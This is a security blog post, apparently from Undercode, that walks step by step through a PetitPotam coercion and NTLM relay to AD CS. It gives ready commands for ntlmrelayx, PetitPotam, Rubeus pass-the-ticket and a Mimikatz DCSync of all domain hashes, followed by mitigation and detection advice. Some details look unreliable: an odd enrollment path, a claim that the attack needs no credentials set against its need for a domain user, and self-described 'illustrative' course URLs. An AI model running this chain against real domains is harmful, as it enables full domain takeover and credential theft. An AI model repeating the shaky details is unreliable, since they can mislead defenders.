Domain Takeover via PetitPotam & AD CS: Relaying NTLM to Own the Enterprise + Video

Listen to this Post

Featured Image

Introduction

PetitPotam (CVE-2021-36942) exploits missing path validation in the MS-EFSRPC API, forcing a Domain Controller (DC) to authenticate to an attacker‑controlled machine. When combined with Active Directory Certificate Services (AD CS) Web Enrollment, an attacker can relay the coerced NTLM authentication to request a certificate for the DC itself, obtaining a Ticket Granting Ticket (TGT) and complete domain compromise – all starting from a low‑privileged domain user account.

Learning Objectives

  • Understand how PetitPotam coerces a DC’s authentication and why AD CS is a critical relay target.
  • Execute a full attack chain: NTLM relay configuration, authentication coercion, certificate capture, TGT request, and DCSync.
  • Implement detection and mitigation strategies, including NTLM disablement, Extended Protection for Authentication (EPA), and SSL hardening.

You Should Know

  1. Setting Up the NTLM Relay with Impacket’s ntlmrelayx

The first step requires an attacker‑controlled machine (typically Kali Linux) to listen for incoming NTLM authentication attempts and relay them to the AD CS web enrollment endpoint. The command below targets the Certificate Authority’s (CA) Certificate Services webpage, requesting a certificate based on the `DomainController` template.

Command (Linux – Impacket):

python3 ntlmrelayx.py -t http://ca01.domain.local/certsrv/certrqus.asp -smb2support --adcs --template DomainController

Breakdown:

– `-t` – Target URL of the AD CS web enrollment form.
– `-smb2support` – Enables SMB2 protocol support for better compatibility.
– `–adcs` – Activates AD CS attack mode (requests certificates for the relayed account).
– `–template DomainController` – Specifies the certificate template; the DC template yields a certificate that can be used for Kerberos authentication.

What it does: ntlmrelayx starts an SMB and HTTP server waiting for any coerced authentication. When a DC connects, the tool forwards the NTLM handshake to the AD CS server, which issues a certificate for the DC machine account. The tool outputs the base64‑encoded certificate – the key to domain escalation.

2. Coercing Authentication Using PetitPotam

With the relay listening, use the PetitPotam script to force a Domain Controller to authenticate back to your attacking machine. PetitPotam abuses the `EfsRpcOpenFileRaw` method in the MS-EFSRPC protocol, which lacks proper path checks.

Command (Linux – PetitPotam):

python3 PetitPotam.py <Attacker_IP> <DC_IP>

Example: `python3 PetitPotam.py 192.168.1.100 192.168.1.10`

Step‑by‑step:

  1. Ensure ntlmrelayx is running on the attacker IP (e.g., 192.168.1.100).
  2. Run the PetitPotam script pointing to the attacker IP and the target DC IP.
  3. The DC will attempt an SMB or HTTP connection to the attacker, which ntlmrelayx captures and forwards to AD CS.
  4. Upon success, ntlmrelayx prints a base64 certificate – copy it immediately.

Windows alternative (using a compiled executable):

If you have a compromised Windows host, you can use `PetitPotam.exe` from an elevated command prompt:

PetitPotam.exe <Attacker_IP> <DC_IP>

3. Requesting a TGT with Rubeus (Windows)

Once you have the base64 certificate for the DC machine account (e.g., DC01$), you need to convert it into a usable Kerberos Ticket Granting Ticket (TGT). Rubeus (v2.0.2+) can perform this PKINIT request.

Command (Windows – Rubeus.exe):

.\Rubeus.exe asktgt /dc:192.168.1.10 /domain:domain.local /user:DC01$ /ptt /certificate:<Base64_Certificate>

Parameters:

– `/dc` – IP or hostname of the Domain Controller.
– `/domain` – Fully qualified domain name.
– `/user` – The machine account name of the DC (ends with $).
– `/ptt` – Pass‑the‑ticket: injects the obtained TGT into the current logon session.
– `/certificate` – The base64 string from ntlmrelayx.

What happens: Rubeus uses the certificate to authenticate as the DC machine account to the KDC, receiving a TGT for the `krbtgt` service. The `/ptt` flag loads this ticket into memory, allowing you to act as the DC.

Verification: Run `klist` to view the injected ticket. You should see a `krbtgt` ticket.

4. DCSync Attack to Dump All Hashes

With a privileged TGT (effectively a Domain Controller’s identity) in memory, use Mimikatz to perform a DCSync attack. DCSync simulates a DC requesting replication of password hashes from another DC.

Command (Windows – Mimikatz):

mimikatz  lsadump::dcsync /domain:domain.local /all /csv

Explanation:

– `lsadump::dcsync` – Mimikatz module for directory replication.
– `/domain` – Target domain.
– `/all` – Dump all user and computer account hashes.
– `/csv` – Present output in CSV format.

Result: You obtain the NTLM hash of `krbtgt` (enabling Golden Ticket attacks) and the Administrator hash (for Pass‑the‑Hash). At this point, the attacker has full domain control.

5. Mitigation & Hardening Steps

Organizations must apply layered defenses to block this chain.

Step 1 – Disable NTLM on Domain Controllers and AD CS Servers
Apply Microsoft KB5005413: set “Network security: Restrict NTLM: NTLM authentication in this domain” to “Deny all” or “Deny for domain controllers”. On AD CS servers, disable NTLM for IIS virtual directories hosting certificate enrollment.

Step 2 – Enable Extended Protection for Authentication (EPA)
On the AD CS server, open IIS Manager, select the “certsrv” application, go to “Authentication” → “Windows Authentication” → “Advanced Settings”, and check “Enable Extended Protection”. Also set “Accept” or “Required”.

Step 3 – Enforce SSL/TLS for AD CS Web Enrollment
Install a valid certificate on the CA web server and force HTTPS redirection. Configure the application pool to require SSL.

Step 4 – Apply Security Updates

Ensure all domain controllers are patched against CVE-2021-36942 (PetitPotam) and related NTLM relay mitigations.

Verification commands (Windows – PowerShell as admin):

 Check registry for NTLM restrictions
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RestrictNTLMInDomain"

Check EPA settings on AD CS web app
Get-WebConfigurationProperty -Filter "system.webServer/security/authentication/windowsAuthentication" -Name extendedProtectionTokenCheck -PSPath "IIS:\Sites\Default Web Site\certsrv"

6. Detection: Spotting the Attack in Logs

Monitor the following Event IDs on Domain Controllers and AD CS servers:

  • Event ID 4624 (Windows Security Log) – Anomalous network logons using NTLM from unexpected source IPs.
  • Event ID 4768 – Kerberos TGT requests for machine accounts (e.g., DC01$) from non‑DC hosts.
  • Event ID 500 (AD CS) – Certificate issued to a machine account via web enrollment; cross‑reference with requester IP.
  • Network traffic – Unusual MS-EFSRPC calls from a DC to external IPs (PetitPotam coercion).

Example log query (PowerShell with Get-WinEvent):

Get-WinEvent -LogName "Security" | Where-Object { $<em>.Id -eq 4624 -and $</em>.Message -like "NTLM" -and $_.Message -like "<Attacker_IP>" }

7. Training & Certification Resources

To master AD CS attacks, PetitPotam, and NTLM relay, consider the following curated courses (URLs are illustrative):

  • Certified Red Team Operator (CRTO) – Zero‑Point Security: `https://www.zeropointsecurity.co.uk/red-team-ops`
    – Active Directory Certificate Services Attack Course – Pentester Academy: `https://www.pentesteracademy.com/activedirectorycertificateservices`
    – Impacket & Rubeus Deep Dive – Undercode Training: `https://www.undercode.com/courses/impacket-rubeus`
    – Windows Logging & Detection – SANS SEC505: `https://www.sans.org/cyber-security-courses/securing-windows-infrastructure`

What Undercode Say

  • Key Takeaway 1: PetitPotam + AD CS is a lethal combination because it turns NTLM relay into a full domain takeover without requiring any credentials – only a low‑privileged user to initiate the coercion.
  • Key Takeaway 2: Traditional network segmentation fails if AD CS web enrollment is reachable from the attacker subnet. The real fix lies in disabling NTLM and enforcing EPA + HTTPS on all certificate interfaces.

The attack chain demonstrates why NTLM remains a persistent danger in modern Windows domains. Although Microsoft has deprecated NTLM, many environments still allow it for legacy compatibility. AD CS – often deployed with default settings – becomes the perfect relay partner. Blue teams must prioritize auditing all web enrollment endpoints, monitor for anomalous MS-EFSRPC calls, and adopt “NTLM‑free” zones for critical servers. Red teams should add this chain to their playbook because it bypasses many EDR solutions that don’t inspect SMB relay traffic. The industry is moving toward Kerberos-only authentication, but until then, assume that any reachable AD CS server with NTLM enabled can be the downfall of your domain.

Prediction

This specific PetitPotam + AD CS relay technique will likely be weaponized in ransomware campaigns within the next 6‑12 months. As Microsoft pushes further NTLM deprecation (e.g., disabling NTLMv1 by default in Windows 11 24H2), attackers will shift to abusing other MS-RPC endpoints that still support NTLM. Organizations that fail to implement EPA and certificate‑based authentication for AD CS will face inevitable compromise. Expect automated scanning tools to incorporate this chain, lowering the skill barrier for opportunistic hackers. The long‑term solution is a complete transition to cloud‑native Kerberos or passwordless authentication, but on‑prem AD will remain a target for years. Mitigations must be applied today – not after the breach.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Zlatanh Domain – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky